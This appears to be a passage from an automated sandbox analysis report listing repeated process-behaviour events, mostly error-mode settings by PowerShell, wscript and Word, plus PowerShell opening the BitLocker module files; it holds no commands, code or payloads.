                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
